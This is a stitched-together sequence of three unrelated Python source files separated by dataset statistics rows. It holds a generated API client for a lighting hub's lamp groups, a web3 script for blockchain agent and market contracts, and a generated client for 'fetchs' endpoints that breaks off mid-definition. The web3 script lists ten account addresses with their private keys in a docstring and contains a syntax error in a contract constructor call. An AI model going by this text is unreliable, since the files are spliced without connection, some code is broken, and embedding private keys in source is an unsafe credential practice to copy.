['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/Groups/{group-id}/State', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse20014', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def groups_state_post(self, lamp_state, **kwargs): # noqa: E501
"""Sets the state of a lamp group # noqa: E501
Sets the state of a lamp group specified by a name query parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_state_post(lamp_state, async_req=True)
>>> result = thread.get()
:param lamp_state: Color settings to apply to the lamp group (required)
:type lamp_state: LampState
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param name: name of the group to apply the state
:type name: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: InlineResponse20014
"""
kwargs['_return_http_data_only'] = True
return self.groups_state_post_with_http_info(lamp_state, **kwargs) # noqa: E501
def groups_state_post_with_http_info(self, lamp_state, **kwargs): # noqa: E501
"""Sets the state of a lamp group # noqa: E501
Sets the state of a lamp group specified by a name query parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_state_post_with_http_info(lamp_state, async_req=True)
>>> result = thread.get()
:param lamp_state: Color settings to apply to the lamp group (required)
:type lamp_state: LampState
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param name: name of the group to apply the state
:type name: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(InlineResponse20014, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'lamp_state',
'basicauthuser',
'basicauthpassword',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_state_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'lamp_state' is set
if self.api_client.client_side_validation and ('lamp_state' not in local_var_params or # noqa: E501
local_var_params['lamp_state'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `lamp_state` when calling `groups_state_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'basicauthuser' in local_var_params and local_var_params['basicauthuser'] is not None: # noqa: E501
query_params.append(('basicauthuser', local_var_params['basicauthuser'])) # noqa: E501
if 'basicauthpassword' in local_var_params and local_var_params['basicauthpassword'] is not None: # noqa: E501
query_params.append(('basicauthpassword', local_var_params['basicauthpassword'])) # noqa: E501
if 'name' in local_var_params and local_var_params['name'] is not None: # noqa: E501
query_params.append(('Name', local_var_params['name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'lamp_state' in local_var_params:
body_params = local_var_params['lamp_state']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/Groups/State', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse20014', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def root_get(self, **kwargs): # noqa: E501
"""Get keypads and groups (and scenes in API schema 4 or later) # noqa: E501
Gets all keypads and groups in the installation. Added in hub firmware version 1.14 (API schema 3). Scenes are also returned in API schema 4. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.root_get(async_req=True)
>>> result = thread.get()
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: InlineResponse200
"""
kwargs['_return_http_data_only'] = True
return self.root_get_with_http_info(**kwargs) # noqa: E501
def root_get_with_http_info(self, **kwargs): # noqa: E501
"""Get keypads and groups (and scenes in API schema 4 or later) # noqa: E501
Gets all keypads and groups in the installation. Added in hub firmware version 1.14 (API schema 3). Scenes are also returned in API schema 4. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.root_get_with_http_info(async_req=True)
>>> result = thread.get()
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(InlineResponse200, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'basicauthuser',
'basicauthpassword'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method root_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'basicauthuser' in local_var_params and local_var_params['basicauthuser'] is not None: # noqa: E501
query_params.append(('basicauthuser', local_var_params['basicauthuser'])) # noqa: E501
if 'basicauthpassword' in local_var_params and local_var_params['basicauthpassword'] is not None: # noqa: E501
query_params.append(('basicauthpassword', local_var_params['basicauthpassword'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 55.04679 | 709 | 0.639658 | 6,184 | 50,588 | 5.047704 | 0.043499 | 0.032805 | 0.052026 | 0.031139 | 0.975493 | 0.974756 | 0.973634 | 0.972898 | 0.965369 | 0.963127 | 0 | 0.013832 | 0.298312 | 50,588 | 918 | 710 | 55.106754 | 0.865538 | 0.576856 | 0 | 0.791774 | 1 | 0 | 0.194605 | 0.032543 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033419 | false | 0.046272 | 0.012853 | 0 | 0.079692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8fdc19234d039a9fa61fba44e1d35bd917d60878 | 9,724 | py | Python | dao/py/main.py | akolonin/singnet | 3be30d40a2394325dc14bb55ea2871fe463b9405 | [
"MIT"
] | null | null | null | dao/py/main.py | akolonin/singnet | 3be30d40a2394325dc14bb55ea2871fe463b9405 | [
"MIT"
] | null | null | null | dao/py/main.py | akolonin/singnet | 3be30d40a2394325dc14bb55ea2871fe463b9405 | [
"MIT"
] | 1 | 2020-10-27T01:32:15.000Z | 2020-10-27T01:32:15.000Z | import json
from web3 import Web3, HTTPProvider, IPCProvider
web3 = Web3(HTTPProvider('http://localhost:8545'))
def getAddressByName(addresses,name):
for key, value in addresses.items():
if key==name:
return value
def parseAbi(data):
for key, value in data.items():
if key=='abi':
return value
'''
Available Accounts
==================
(0) 0xbdd3c856d398439524a59f9a0e87958016f246e0
(1) 0x6ace9609e9fc2c52c382c5be6fffd1c9750d3b77
(2) 0x76b9faebe2952cc78a8fe29d7a94109b334c15de
(3) 0x2a7f1faa1b9a2fb7e09a5939f6380cfabbf13f30
(4) 0x52a6285b4a8f81640832300417db57e465e87bed
(5) 0xe93b526ecf72116cb4be7aedd6430f199d7f159d
(6) 0x887b15e382a1acb3b6574f832ed0dec39ce54002
(7) 0x11d92eaa00789811c7d1d195c6b98074400efed2
(8) 0x345f39d894802d15a84173f571652eefa7528eb6
(9) 0xb8cddf7d2c78f52b7488963d82a369915acd3f41
Private Keys
==================
(0) 64b0db5ae93afa13b45a5f887f33d9af17bcb30050b8a41ae7468db4c6ba3349
(1) 66922450e3491b1079e464b722934fbb5c9b7c41da9eb8232c8680d26c9d9599
(2) 8bfa373ced7ea151cee363c0465a87c6bc3304a224b74e587362036984505fe2
(3) e1628c93556d28185807b91a3fb25f44ac3652dfd7b9bf778702b4b7ca074ae0
(4) a916a92d812543800d436902976e4e7a9315bdce7118c585844486d86c912de5
(5) 5f9f683bf47a5fe2bb7e425a5ef15636d12a8ae89b550689928421c913a2def8
(6) f2b624c4d03e2ebe069af90f22e67b5c838dd5c32351b868c275d46d980d93fe
(7) 5cd859497f25339a71aeb9cb4d84d2188cb4edfe30aa08ffe00babc4ae9dc1a4
(8) 3ad759b4f915309211f2fdc6911911f34880caf2564933c21dd7048ce2625fbd
(9) e424215eb29e5484ada1301fabdfd61aed2c688364f7988e6229720628f9743d
Ownable: 0x6c388304d3c7fc40c1a2102cad53047f65bd7683
Escrow: 0x6394dbb6cf1fbc5985eb799966e43e26cb47103e
AgentRegistry: 0xbea2b908a51e8cc5f76238cf022d0d5be1c3c5ac
Agent: 0x45f4f554434a3157ddfb38d17b2b9d4504a8a045
FixedSupplyToken: 0x709c20a1f3df097d493d7b96f31478cb8ab288b7
OrganizationFactory: 0x311584fe6518fa0367e6a0d1e56b3c9f09035b35
AgentFactory: 0x8b6d3d6db2333e6781fa4918926dd742152976c8
Organization: 0x54c49a1445d827d0336158f406d0349e9b00cf4f
SingularityNetToken: 0x9f3e6393774fdec4f78186f04f70ca6c28f92d25
'''
#payloads
payload = {'from': web3.eth.coinbase, 'gas': 1500000, 'gasPrice':30000000000000}
#ABI(s)
agentRegistryAbi = parseAbi(json.loads(open('../build/contracts/AgentRegistry.json','r').read()))
agentFactoryAbi = parseAbi(json.loads(open('../build/contracts/AgentFactory.json','r').read()))
marketJobAbi = parseAbi(json.loads(open('../build/contracts/MarketJob.json','r').read()))
agentAbi = parseAbi(json.loads(open('../build/contracts/Agent.json','r').read()))
crowdsaleAbi = parseAbi(json.loads(open('../build/contracts/AgiCrowdsale.json','r').read()))
#addresses
agentRegistryAddress = getAddressByName(json.loads(open('../addresses.json','r').read()),'AgentRegistry')
agentFactoryAddress = getAddressByName(json.loads(open('../addresses.json','r').read()),'AgentFactory')
marketJobAddress = getAddressByName(json.loads(open('../addresses.json','r').read()),'MarketJob')
agentAddress = getAddressByName(json.loads(open('../addresses.json','r').read()),'Agent')
crowdsaleAddress = getAddressByName(json.loads(open('../addresses.json','r').read()),'AgiCrowdsale')
#Contracts
agentRegistryContract = web3.eth.contract(abi = agentRegistryAbi, address=agentRegistryAddress)
agentFactoryContract = web3.eth.contract(abi = agentFactoryAbi, address=agentFactoryAddress)
marketJobContract = web3.eth.contract(abi = marketJobAbi, address=marketJobAddress, bytecode="0x6060604052604051610760380380610760833981016040528080518201919060200180518201919060200180519190602001805182019190602001805190910190505b60005b60008054600160a060020a03191633600160a060020a03161790555b845186511461006f57600080fd5b60018054600160a060020a031916600160a060020a038616179055600282805161009d92916020019061011f565b5060038380516100b192916020019061011f565b50600090505b8451811015610113578481815181106100cc57fe5b90602001906020020151600560008884815181106100e657fe5b90602001906020020151600160a060020a031681526020810191909152604001600020555b6001016100b7565b5b5050505050506101bf565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061016057805160ff191683800117855561018d565b8280016001018555821561018d579182015b8281111561018d578251825591602001919060010190610172565b5b5061019a92915061019e565b5090565b6101bc91905b8082111561019a57600081556001016101a4565b5090565b90565b610592806101ce6000396000f300606060405236156100a15763ffffffff7c0100000000000000000000000000000000000000000000000000000000600035041663123119cd81146100a65780632f54bf6e146100d55780633ccfd60b1461010857806355a3b2c11461011d578063626568dc1461014e5780638da5cb5b146101d9578063a552386b14610208578063b2a7a8371461022f578063e33b39cf146102ba578063f2fde38b146102cf575b600080fd5b34156100b157600080fd5b6100b96102f0565b604051600160a060020a03909116815260200160405180910390f35b34156100e057600080fd5b6100f4600160a060020a03600435166102ff565b604051901515815260200160405180910390f35b341561011357600080fd5b61011b610316565b005b341561012857600080fd5b61013c600160a060020a036004351661039e565b60405190815260200160405180910390f35b341561015957600080fd5b6101616103b0565b60405160208082528190810183818151815260200191508051906020019080838360005b8381101561019e5780820151818401525b602001610185565b50505050905090810190601f1680156101cb5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34156101e457600080fd5b6100b961044e565b604051600160a060020a03909116815260200160405180910390f35b341561021357600080fd5b6100f461045d565b604051901515815260200160405180910390f35b341561023a57600080fd5b610161610466565b60405160208082528190810183818151815260200191508051906020019080838360005b8381101561019e5780820151818401525b602001610185565b50505050905090810190601f1680156101cb5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34156102c557600080fd5b61011b610504565b005b34156102da57600080fd5b61011b600160a060020a0360043516610525565b005b600154600160a060020a031681565b600054600160a060020a038281169116145b919050565b60045460009060ff16151560011461032d57600080fd5b600160a060020a0333166000908152600560205260408120541161035057600080fd5b50600160a060020a033316600081815260056020526040808220805492905590919082156108fc0290839051600060405180830381858888f19350505050151561039957600080fd5b5b5b50565b60056020526000908152604090205481565b60038054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156104465780601f1061041b57610100808354040283529160200191610446565b820191906000526020600020905b81548152906001019060200180831161042957829003601f168201915b505050505081565b600054600160a060020a031681565b60045460ff1681565b60028054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156104465780601f1061041b57610100808354040283529160200191610446565b820191906000526020600020905b81548152906001019060200180831161042957829003601f168201915b505050505081565b60045460ff161561051457600080fd5b6004805460ff191660011790555b5b565b61052e336102ff565b151561053957600080fd5b6000805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a0383161790555b5b505600a165627a7a723058204b360ed4e2a55422759240b12589fce4b67afa92f3d4db7484283b50c211d5210029")
agentContract = web3.eth.contract(abi = agentAbi, address=agentAddress)
crowdsaleContract = web3.eth.contract(abi = crowdsaleAbi, address=crowdsaleAddress, args)
def joinNetwork():
return agentFactoryContract.transact(payload).create()
def advertiseService(service,agent):
return agentRegistryContract.transact(payload).addAgent(service,agent)
def findServiceProviders(service):
return agentRegistryContract.call(payload).getAgentsWithService(service)
def getAgentsById(id):
return agentRegistryContract.call(payload).getAgent(id)
def createMarketJob(agents,amounts,payer,firstService,lastService):
return marketJobContract.deploy(transaction={'from': web3.eth.accounts[8],'value': web3.toWei(1, 'ether')},args=(agents,amounts,payer,firstService,lastService))
def setJobCompleted():
return marketJobContract.call(payload).setJobCompleted()
def payAgent(agentAccounts):
return marketJobContract.call({'from': agentAccounts[0]}).withdraw()
# assign an integer for each service
# wordSenseDisambiguation = 0,
# textSummarization = 1
# # Here I'm joining the network and putting in myself the address on the blockchain
# myself1 = joinNetwork()
# print("myself_1 {0}".format(myself1))
# myself2 = joinNetwork()
# print("myself_2 {0}".format(myself2))
# #TODO: add event watch AgentAdded
# #Add an agent (address) and its service (id, unit, pricePerUnit) to the registry
# advertiseService(0, 0, 20, web3.eth.accounts[1])
# #Create a new market with two agents
# agentAccounts = [web3.eth.accounts[4],web3.eth.accounts[5]]
# rewardsForServices = [web3.toWei(0.5, 'ether'),web3.toWei(0.5, 'ether')]
# payer = web3.eth.accounts[2]
# marketJob = createMarketJob(agentAccounts,rewardsForServices,payer,"0","1")
# print("market_job {0}".format(marketJob))
# #Complete all jobs
# setJobCompleted()
# #Let agent be payed for his service(s)
# payAgent(agentAccounts)
#Here I'm inserting a new agent for a determined service
'''print("\n\nadvertize service\n")
print(advertiseService(0,myself))
print(advertiseService(0,test_agent))
print(advertiseService(72182,test_agent))
## Here I'm printing
print("\n\nfind service providers for 0\n")
print(getAgentsById(findServiceProviders(0)[0]))
print(getAgentsById(findServiceProviders(0)[1]))
print("\n\nfind service providers for 72182\n")
print(findServiceProviders(72182)[0])
test_provider_address = findServiceProviders(72182)[0]
test_provider = getAgentsById(test_provider_address)'''
| 67.062069 | 3,874 | 0.876388 | 549 | 9,724 | 15.504554 | 0.35337 | 0.009046 | 0.015273 | 0.012336 | 0.077538 | 0.055216 | 0.027608 | 0.027608 | 0 | 0 | 0 | 0.481574 | 0.048437 | 9,724 | 144 | 3,875 | 67.527778 | 0.438344 | 0.10109 | 0 | 0.04878 | 0 | 0 | 0.646226 | 0.61463 | 0 | 1 | 0.588016 | 0.006944 | 0 | 0 | null | null | 0 | 0.04878 | null | null | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
56da03e807adb6ea9ba815344e6f2b7312dbb378 | 33,229 | py | Python | openapi_client/api/fetchs_api.py | osuka/dognews-scraper | 12373064061157083a48ced8e2cabf9d1ace30a5 | [
"MIT"
] | 1 | 2019-11-15T13:19:36.000Z | 2019-11-15T13:19:36.000Z | openapi_client/api/fetchs_api.py | osuka/news-extractor | 12373064061157083a48ced8e2cabf9d1ace30a5 | [
"MIT"
] | null | null | null | openapi_client/api/fetchs_api.py | osuka/news-extractor | 12373064061157083a48ced8e2cabf9d1ace30a5 | [
"MIT"
] | null | null | null | """
Dognews Server API
Dognews Server client API # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from openapi_client.api_client import ApiClient, Endpoint as _Endpoint
from openapi_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from openapi_client.model.fetch import Fetch
from openapi_client.model.paginated_fetch_list import PaginatedFetchList
from openapi_client.model.patched_fetch import PatchedFetch
class FetchsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __fetchs_create(
self,
**kwargs
):
"""fetchs_create # noqa: E501
SFetching results attached to a submission **Permission restrictions:** + `IsAuthenticated`: *Rejects all operations if the user is not authenticated* + `IsOwnerOrStaff`: *Blocks update/partial_updated/destroy if: * the user is NOT in the staff group * AND if the model has a property called 'owner' and its value differs from the request user Everything else is allowed* + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetchs_create(async_req=True)
>>> result = thread.get()
Keyword Args:
fetch (Fetch): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Fetch
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.fetchs_create = _Endpoint(
settings={
'response_type': (Fetch,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/fetchs',
'operation_id': 'fetchs_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'fetch',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'fetch':
(Fetch,),
},
'attribute_map': {
},
'location_map': {
'fetch': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/x-www-form-urlencoded',
'multipart/form-data'
]
},
api_client=api_client,
callable=__fetchs_create
)
def __fetchs_destroy(
self,
submission,
**kwargs
):
"""fetchs_destroy # noqa: E501
SFetching results attached to a submission **Permission restrictions:** + `IsAuthenticated`: *Rejects all operations if the user is not authenticated* + `IsOwnerOrStaff`: *Blocks update/partial_updated/destroy if: * the user is NOT in the staff group * AND if the model has a property called 'owner' and its value differs from the request user Everything else is allowed* + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetchs_destroy(submission, async_req=True)
>>> result = thread.get()
Args:
submission (int): A unique value identifying this fetch.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['submission'] = \
submission
return self.call_with_http_info(**kwargs)
self.fetchs_destroy = _Endpoint(
settings={
'response_type': None,
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/fetchs/{submission}',
'operation_id': 'fetchs_destroy',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'submission',
],
'required': [
'submission',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'submission':
(int,),
},
'attribute_map': {
'submission': 'submission',
},
'location_map': {
'submission': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [],
},
api_client=api_client,
callable=__fetchs_destroy
)
def __fetchs_list(
self,
**kwargs
):
"""fetchs_list # noqa: E501
SFetching results attached to a submission **Permission restrictions:** + `IsAuthenticated`: *Rejects all operations if the user is not authenticated* + `IsOwnerOrStaff`: *Blocks update/partial_updated/destroy if: * the user is NOT in the staff group * AND if the model has a property called 'owner' and its value differs from the request user Everything else is allowed* + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetchs_list(async_req=True)
>>> result = thread.get()
Keyword Args:
limit (int): Number of results to return per page.. [optional]
offset (int): The initial index from which to return the results.. [optional]
ordering (str): Which field to use when ordering the results.. [optional]
status (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
PaginatedFetchList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.fetchs_list = _Endpoint(
settings={
'response_type': (PaginatedFetchList,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/fetchs',
'operation_id': 'fetchs_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'limit',
'offset',
'ordering',
'status',
],
'required': [],
'nullable': [
],
'enum': [
'status',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('status',): {
"FETCHED": "fetched",
"PENDING": "pending",
